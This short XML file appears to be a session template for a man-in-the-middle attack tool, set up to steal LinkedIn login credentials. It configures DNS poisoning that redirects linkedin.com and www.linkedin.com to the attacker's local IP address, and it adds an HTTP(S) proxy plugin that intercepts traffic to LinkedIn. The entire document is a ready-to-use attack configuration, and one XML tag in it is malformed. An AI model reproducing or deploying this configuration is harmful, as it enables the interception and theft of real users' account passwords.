<SessionTemplate>

  <Config>
    <Name>Linkedin user login</Name>
    <Description>Sniffing user credentials from login attempt on Linkedin authentication procedure</Description>
    <Timestamp>2016-02-27</Timestamp>
    <Version>0.2</Version>
    <Author>Simsang</Author>
    <Reference>http://buglist.io/ </Reference>
  </Config>

  </Hops>
    <Hop>
      <Host>GET http://DUMMY</Host>
      <Description>User typed URL in browser</Description>
    </Hop>
  </Hops>    
    

<Plugins>
<Plugin name="DNS Poisoning" dirname="DNSPoisoning">

<ArrayOfDNSPoisonRecord xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <DNSPoisonRecord>
    <HostName>www.linkedin.com</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>linkedin.com</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>  
</ArrayOfDNSPoisonRecord>
</Plugin>


<Plugin name="HTTP(S) proxy" dirname="HTTPProxy">

<PluginData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <RemoteHost>www.linkedin.com</RemoteHost>
  <RedirectURL />
  <Records />
</PluginData>
</Plugin>


</Plugins>

</SessionTemplate>
